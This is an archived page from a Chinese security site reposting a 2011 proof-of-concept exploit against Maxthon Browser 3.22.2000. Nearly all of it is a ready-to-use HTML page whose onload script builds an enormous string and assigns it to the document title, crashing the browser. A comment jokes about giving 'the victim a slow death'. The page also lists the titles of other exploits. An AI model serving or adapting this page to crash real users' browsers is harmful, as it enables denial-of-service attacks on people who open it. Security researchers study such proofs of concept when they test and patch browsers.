首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Maxthon Browser 3.22.2000 Denial Of Service
来源:xecuti0n3r(at)yahoo.com 作者:Xecuti0n3r 发布时间:2011-04-26  
#(+)Exploit Title: Maxthon Browser 3.22.2000 0day BOF/DOS Exploit 
#(+)Created By: ^Xecuti0n3r
#(+)Software  : Maxthon Browser
#(+)Version   : 3.22.2000 
#(+)Tested On : Win-XP-Sp3
#(+) Date     : 23.04.2011
#(+) Hour     : 13:37 PM
#(+) E-mail   : xecuti0n3r()yahoo.com

CODE:
______________________________________________________________________________________________________
______________________________________________________________________________________________________

<HTML>
<HEAD>
<TITLE> Maxthon Browser 0day BOF/DOS Exploit </TITLE>
</HEAD>
<SCRIPT type="text/javascript">

<!-- Wanna give the victim a slow death..then put the value of overflow vector "x" as x = 10000-->

function overflow()
{ var poc1 = "";
  for (var x = 0;x < 20000; x++)
   {
     poc1 += "A";
   }
  var poc2 = poc1;   <!-- poc2 = poc is the actual buffer which causes overflow -->
  for (x = 0; x < 20000; x++) {
  poc2 += poc1;
}
document.title = poc2;
}

</SCRIPT>
</TITLE>
<BODY onload="javascript:overflow();" >
</BODY>
</HTML>
______________________________________________________________________________________________________
______________________________________________________________________________________________________

#######################
(+)Exploit Coded by: ^Xecuti0n3r 
(+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r
#######################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·RealPlayer 11 Browser Active-X
·eXPert PDF Editor 7 Profession
·WordPress SermonBrowser Plugin
·eZip Wizard 3.0 Stack Buffer O
·AT-TFTP Server 1.8 Denial Of S
·Subtitle Processor 7.7.1 SEH U
·PHP phar extension 1.1.1 Heap
·EMC HomeBase Server Directory
·libmodplug <= 0.8.8.2 .abc Sta
·Spreecommerce Arbitrary Comman
·NetOp Remote Control 8.0, 9.1,
·KMPlayer 2.9.x (.kpl) Stack Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved